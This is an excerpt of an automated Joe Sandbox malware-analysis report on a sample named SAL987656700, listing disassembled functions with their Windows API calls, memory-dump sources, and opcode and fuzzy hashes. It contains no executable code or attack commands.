                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 8e6dc47841f4eb7731039399e22d8c498a10928516a3b7f8cc0c54cfa2b79f74
                                      • Instruction ID: 49a23df17d3d323da0424709288e838f75ee04c0f3faf8baddf07c96fb18bea3
                                      • Opcode Fuzzy Hash: 8e6dc47841f4eb7731039399e22d8c498a10928516a3b7f8cc0c54cfa2b79f74
                                      • Instruction Fuzzy Hash: F0E01A712102189FD710EF69D804E9ABBE9FFA8764F008416FD49C7261DAB0A8408BA1
                                      Function 00919380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 009193C0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 3a505744ff969ad2e9eab78d347c41ccdc6e41bf061cbb76fc7bc2abe70576e9
                                      • Instruction ID: f5c1e6cd8d9914defc6569a2351791b666066ad9ee4c8d83013ccc9632c907c7
                                      • Opcode Fuzzy Hash: 3a505744ff969ad2e9eab78d347c41ccdc6e41bf061cbb76fc7bc2abe70576e9
                                      • Instruction Fuzzy Hash: 96F09231248358BFDB21DF58DC15FC63BA5EB06360F044448FA25672E1CB7179A0E7A0
                                      Function 008990A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 008990D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 0425d9a31815e5a1b15b29c3403b8d58ad80da0a2c60484f20c5b95fb73e2ec5
                                      • Instruction ID: 91adea09c4f9c3eec1a836dcf379a330b40777fe3cd8b68041eb1b02a6447e09
                                      • Opcode Fuzzy Hash: 0425d9a31815e5a1b15b29c3403b8d58ad80da0a2c60484f20c5b95fb73e2ec5
                                      • Instruction Fuzzy Hash: 74E0C230244304FBCF14AF98DC11F643B2BFB48361F108008FA554A2A1CB33A9A1EB10
                                      Function 009193CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008D7723,?,?,?,?,?,?), ref: 009193F6
                                        • Part of subcall function 00918172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00953018,0095305C), ref: 009181BF
                                        • Part of subcall function 00918172: CloseHandle.KERNEL32 ref: 009181D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseCreateDialogHandleNtdllProc_Process
                                      • String ID:
                                      • API String ID: 4178364262-0
                                      • Opcode ID: 2da6952aa877da55ffe7535af05148d956f71bfc815d388424d66f7e66d94db8
                                      • Instruction ID: 3d3c09acb298161b498df7626fb3ec9086f3d6a27888955858002f7956b48eb4
                                      • Opcode Fuzzy Hash: 2da6952aa877da55ffe7535af05148d956f71bfc815d388424d66f7e66d94db8
                                      • Instruction Fuzzy Hash: BCE04632258208EFCB01AF04EC60EC63B76FB08351F004004FA21172B2CB32A9A1EF10
                                      Function 00898BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 00898BCD: DestroyWindow.USER32(?), ref: 00898C81
                                        • Part of subcall function 00898BCD: KillTimer.USER32(00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898D1B
                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00898BC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                      • String ID:
                                      • API String ID: 2797419724-0
                                      • Opcode ID: 2c21eebffee8a28c435b6525e9a543c318bf786916f3cae3f6f23f586dcea2c5
                                      • Instruction ID: 03d4265f85c4286fb4baa0bbb4b1a04c6ca48eab23479ea69cfb9a3dcac88bb7
                                      • Opcode Fuzzy Hash: 2c21eebffee8a28c435b6525e9a543c318bf786916f3cae3f6f23f586dcea2c5
                                      • Instruction Fuzzy Hash: F1D01270284308B7EE203B69DC07F893A59EB017B1F448020FB04791D1CA7264909559
                                      Function 008A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008A03EE), ref: 008A09DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: b9cb87468f80ffd98bdea4ceaa14172e8ea88953198c333f633ef5cf546fba6f
                                      • Instruction ID: 7b4cbc3b75499490a1633b5e314d2856eb6201e57fd573c8ba96f1a12b8889ba
                                      • Opcode Fuzzy Hash: b9cb87468f80ffd98bdea4ceaa14172e8ea88953198c333f633ef5cf546fba6f
                                      • Instruction Fuzzy Hash:
                                      Function 008A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction ID: 81c3914124f3689a1cd5c961231cf76d52588c0120a76c7cd5753cf3bccd0432
                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction Fuzzy Hash: 7C51466160C6499AFB3845288C597BF2B89FB13344F1C053AD886D7E82D61DEE05F35A
                                      Function 008B6DD9 Relevance: .6, Instructions: 637COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ad6e06dad22bc8433dbde365ef9fbb82652a5d13982100ba1e57c9d26e55c89
                                      • Instruction ID: 362aae3a1b1e9d3a883b259925498dac4aca68c145e5b5034025058896c4b0cd
                                      • Opcode Fuzzy Hash: 1ad6e06dad22bc8433dbde365ef9fbb82652a5d13982100ba1e57c9d26e55c89
                                      • Instruction Fuzzy Hash: A032F022D2DF414DD7339634D822336A689EFB73C5F15D737E82AB5AA9EB29C4835100
                                      Function 0089CC39 Relevance: .6, Instructions: 635COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f43b193208dbb2f2474ea7edbe8feeff20be08bb5a8476204d5651af5e112c1c
                                      • Instruction ID: e9b2ee5668a253a807393cd0971e09b3956184bc3b79e79b9834254ae3aa0bf3
                                      • Opcode Fuzzy Hash: f43b193208dbb2f2474ea7edbe8feeff20be08bb5a8476204d5651af5e112c1c
                                      • Instruction Fuzzy Hash: EC322531A4411B8BDF28CF69C890A7D7BA1FF45318F28866BD84ACB391D631DD81DB40
                                      Function 00887920 Relevance: .6, Instructions: 563COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62ace0a92a36a3f681933ad6fe30ee27278d042354a35281f6476e00e387ddad
                                      • Instruction ID: 24d211e9db6e18f09b2dd74599abcf8173b50558574433e4527a974e45ead8b2
                                      • Opcode Fuzzy Hash: 62ace0a92a36a3f681933ad6fe30ee27278d042354a35281f6476e00e387ddad
                                      • Instruction Fuzzy Hash: 6422BFB0A046099FDF14DFA8C881BAEB7B6FF44314F244529E816EB291EB35E950CB51
                                      Function 008891C0 Relevance: .5, Instructions: 475COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c63d7f948f3412cd7ffa06bbeac19e171e36b45e93ba914db8d6bba91fc7350
                                      • Instruction ID: 14ab3ff0acb6b9947687cc10bfd00a6475adf30c0ada9dd5a07d66269539089a
                                      • Opcode Fuzzy Hash: 0c63d7f948f3412cd7ffa06bbeac19e171e36b45e93ba914db8d6bba91fc7350
                                      • Instruction Fuzzy Hash: B902A5B0A10119EFDF04EF58D841BADB7B1FF54304F548169E956DB291EB31EA10CB91
                                      Function 008A1C77 Relevance: .3, Instructions: 254COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                      • Instruction ID: ae5962273a0b904434c067ec9ceb4b065f4128a0ba1b0b764cf78f2123346ec3
                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                      • Instruction Fuzzy Hash: CD9157726080A34AFF294639857C07EFFE1EA533B1B1A079DD4F2CA9C5FE149964D620
                                      Function 008A19B0 Relevance: .2, Instructions: 240COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                      • Instruction ID: 30fe702218617d97083cfcde397077e1a2001302d1b723af58e8192ca0187390
                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                      • Instruction Fuzzy Hash: 779141722090B24AFF69427A857C03EFEE1AA933B1B1A079DD4F2CA9C1FD249555D620
                                      Function 008A7A4A Relevance: .2, Instructions: 237COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a7892532af15caca31ef041a54b4f83b39d001fd6d73e952c4be8b5deccec73
                                      • Instruction ID: de5be2a59c1193cdf95df14f9578d2665eedb9de94734de4bf3df0e255af5de2
                                      • Opcode Fuzzy Hash: 1a7892532af15caca31ef041a54b4f83b39d001fd6d73e952c4be8b5deccec73
                                      • Instruction Fuzzy Hash: 1C6179B1208719A6FB349A2C8C95BBF2394FF43364F140919E942DBE81D611AE43F376
                                      Function 008A7CA7 Relevance: .2, Instructions: 237COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9685fdeda11f3aef6026e587c2618ace5c8137fea7f7f310603652035fefaa5e
                                      • Instruction ID: db08d3dc2dc4613a323ae0bcba98ca490c9e980cea595eea1157f37dd1b81a46
                                      • Opcode Fuzzy Hash: 9685fdeda11f3aef6026e587c2618ace5c8137fea7f7f310603652035fefaa5e
                                      • Instruction Fuzzy Hash: 3C618A7160870996FF384A2C4C65BBF2384FF43B04F140959E943CBE89EA56AD42B366
                                      Function 008A1706 Relevance: .2, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                      • Instruction ID: 85791e1b5ef6e88849410596f321b1903b709e447f435c18460483bc379b696a
                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                      • Instruction Fuzzy Hash: E58153726090A309FF6D4239857843EFFE1FA933A1B1E17ADD4F2CA9C5EE148554D620
                                      Function 01395848 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: a73e04a0ce23376653da9ad54bbdda9837b46a678e2b57d0ed1858c288a2d042
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 8241D271D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                      Function 008F2046 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3693c815779cec3a33c8d6278170fe4fdc6740a9881a085fa94f623fabe5e20
                                      • Instruction ID: fc54de8ef03b78f3b3e8c164f270985dc5d4efe624fe4e53b6df95d29f729943
                                      • Opcode Fuzzy Hash: f3693c815779cec3a33c8d6278170fe4fdc6740a9881a085fa94f623fabe5e20
